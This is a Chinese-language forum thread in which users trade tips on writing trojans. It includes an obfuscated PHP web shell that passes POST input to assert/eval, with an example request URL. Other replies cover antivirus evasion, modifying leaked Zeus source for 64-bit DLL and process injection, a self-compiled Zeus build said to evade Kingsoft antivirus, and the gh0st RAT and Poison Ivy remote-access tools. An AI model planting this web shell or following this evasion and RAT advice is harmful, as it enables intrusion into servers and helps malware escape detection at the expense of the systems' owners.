这里有人写过木马么？

@evilddog 看不懂呢，函数参数是函数名的兄弟？、、

以前做过免杀, 好多年前了。有源代码免杀和汇编免杀。。 可以通过multccl来进行特征码定位。。

去看雪问问~

@bugeye 现在是个杀软都带启发式检测……

@evilddog
这个其实不算。只有在Register Globals为ON的情况下
url.com/test.php?_=assert&__=eval($_POST[hi]) 才能使用
Register Globals已自 PHP 5.3.0 起废弃并将自 PHP 5.4.0 起移除。

完整的是

<?php
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|" ").($_[+""]|"").($_[+""]^" ");
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>

直接下载Zeus的源代码吧，你说的都支持了
不过之前泄漏出来的代码是32位的，64位系统上只能以单进程跑。
需要修改了一下代码，才能让64位系统也能注入dll和注入进程。

自己编译的zeus免杀的,用金山杀不出来。。

gh0st rat 3.5 很经典的开源远控，后期有不少作品都是基于gh0st制作的

还有一个牛逼的，Poison Ivy，生成 shellcode 自己封成PE